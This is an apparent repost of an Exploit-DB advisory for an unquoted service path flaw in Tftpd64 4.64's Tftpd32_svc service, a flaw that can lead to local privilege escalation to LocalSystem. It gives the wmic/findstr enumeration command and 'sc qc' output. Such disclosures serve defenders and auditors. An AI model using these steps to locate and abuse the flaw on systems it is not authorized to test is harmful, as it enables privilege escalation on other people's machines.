Tftpd64 4.64 – ‘Tftpd32_svc’ Unquoted Service Path - 体验盒子

作者： Brian Rodriguez

日期： 2021-06-14

类别：

local

平台：

windows

来源：https://www.exploit-db.com/exploits/50004/

# Exploit Title: Tftpd64 4.64 - 'Tftpd32_svc' Unquoted Service Path
# Discovery by: Brian Rodriguez
# Date: 14-06-2021
# Vendor Homepage: https://bitbucket.org/phjounin/tftpd64/src/master/
# Software Links: https://bitbucket.org/phjounin/tftpd64/wiki/Download%20Tftpd64.md
# Tested Version: 4.64
# Vulnerability Type: Unquoted Service Path
# Tested on: Windows 10 Enterprise

# Step to discover Unquoted Service Path:

C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto"
|findstr /i /v "c:\windows\\" |findstr /i /v """
Tftpd32 service edition Tftpd32_svc C:\Program
Files\Tftpd64_SE\tftpd64_svc.exe Auto

C:\Users\IEUser>sc qc Tftpd32_svc
[SC] QueryServiceConfig CORRECTO

NOMBRE_SERVICIO: Tftpd32_svc
TIPO : 10WIN32_OWN_PROCESS
TIPO_INICIO: 2 AUTO_START
CONTROL_ERROR: 1 NORMAL
NOMBRE_RUTA_BINARIO: C:\Program Files\Tftpd64_SE\tftpd64_svc.exe
GRUPO_ORDEN_CARGA:
ETIQUETA : 0
NOMBRE_MOSTRAR : Tftpd32 service edition
DEPENDENCIAS :
NOMBRE_INICIO_SERVICIO: LocalSystem